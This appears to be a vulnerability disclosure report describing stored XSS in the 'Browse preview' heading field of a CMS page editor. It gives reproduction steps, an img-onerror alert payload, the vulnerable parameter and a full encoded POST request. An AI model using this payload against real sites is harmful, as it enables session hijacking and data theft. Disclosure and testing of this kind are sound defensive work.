Description

There is accumulated XSS in the preview title of the page.

Proof of Concept

Step 1. Log in to the administrator screen and create a new page.
Step 2. Insert "Browse preview" from "Add new block" and specify Payload in "Preview title". Step 3. When you access the preview screen in the saved state, the embedded script (alert) will be executed.

Payload

<img src=x onerror=alert(document.domain)>

Parameter

o:block[0][o:data][heading]

Request

POST /admin/site/s/test/page/test HTTP/1.1
 ...

o%3Ais_public=1&sitepageform_csrf=f49b093285a9d1c137c456c725a74649-f2ddcd5a1ccc9cb264a38318182dd604&o%3Atitle=test&o%3Aslug=test&o%3Ablock%5B0%5D%5Bo%3Alayout%5D=browsePreview&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bresource_type%5D=items&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bquery%5D=&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blimit%5D=12&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-heading&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-body&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=thumbnail&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bheading%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blink-text%5D=Browse+all

PoC Video

https://drive.google.com/file/d/1PIReOl9qiJBUqw9522ctxrHGBvn8JUOI/view?usp=sharing

Impact

Stored XSS vulnerabilities can lead to data theft, account compromise, and the distribution of malware.
Attackers can inject malicious scripts into a website, allowing them to steal sensitive information or hijack user sessions.
Additionally, stored XSS can result in website defacement and content manipulation, causing reputational damage.
It can also be used as a platform for launching phishing attacks, tricking users into revealing their credentials or sensitive data.